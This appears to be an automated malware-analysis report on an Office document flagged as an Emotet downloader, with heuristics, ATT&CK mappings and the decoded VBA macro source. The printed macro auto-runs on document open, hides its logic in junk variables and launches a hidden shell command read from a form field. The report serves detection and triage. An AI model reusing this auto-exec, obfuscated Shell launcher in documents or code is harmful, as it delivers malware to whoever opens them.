MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a Microsoft Office document containing VBA macros. The 'Document_Open' macro triggers the execution of a shell command via the VBA Shell() function. This behavior is characteristic of downloader malware, and ClamAV detection specifically identifies it as Emotet. The script's primary function is to execute an external command, likely to download and run a secondary payload.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6872645-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6872645-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1983 bytes |
SHA-256: 22a9ead0d2840841e61f6d866dca69bfde13e4b8ae9ceaa2f0e3134d444dd592 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Dim IrcSTp As Single
IrcSTp = Int(39192.497252085)
Dim SFypH As Byte
SFypH = 122
Dim FnfEuU5pX As Single
FnfEuU5pX = Sgn(30991.687716647)
If -168 + 232 = -1437 + 1442 Then
VJUet3sK = "C6FNaZMtR"
End If
Dim w4sk0CoR As Byte
w4sk0CoR = 90
Call z
End Sub
Attribute VB_Name = "te3RE2"
Sub Hjg7h1K()
End Sub
Public Sub z()
Dim FMZNLxt As Single
FMZNLxt = Sgn(53762.253692015)
Dim YC4lmx As Long
YC4lmx = 0
Dim R1Tbl As String
R1Tbl = Val("Q")
Dim oRjqu9raL As Boolean
oRjqu9raL = False
Dim QbGW2po8 As String
QbGW2po8 = Val(dZ5aDsu)
Dim JXgNwt As Long
JXgNwt = Sgn(0)
Dim gqw1bEWCO As Byte
gqw1bEWCO = 119
nnVmzl36 = VBA.Shell(LHN08X, 0)
End Sub
Attribute VB_Name = "aIzW4"
Sub VWP29obw0()
End Sub
Sub YZYo5()
End Sub
Sub E7HVB()
End Sub
Attribute VB_Name = "cXZdfnr"
Sub VlSpfV()
Dim xk7ZuHsV As Byte
xk7ZuHsV = 32
Dim e50cZjev As Byte
e50cZjev = 247
End Sub
Public Function LHN08X()
Dim np5glO As Double
np5glO = Fix(6793.8523434159)
Dim BGKS0VpZ As Byte
BGKS0VpZ = 180
Dim fnDmJ As Object
Dim dzrqT8 As Long
dzrqT8 = -1295325084
Dim qANbMoe
qANbMoe = LTrim(U0eaCH)
Set fnDmJ = New fm
Dim KPRiz
KPRiz = vbNullString
Dim BUJvBe As Boolean
BUJvBe = False
Dim xaIBphs
xaIBphs = LCase(Zh4M1EV)
Dim j4nrwtGRC
j4nrwtGRC = "8"
LHN08X = fnDmJ.mynewtxt.Text
End Function
Attribute VB_Name = "fm"
Attribute VB_Base = "0{782A6242-166A-4BBA-A3E1-13BD6A677933}{75BF4742-16E8-4555-A815-8BCC71B664F0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.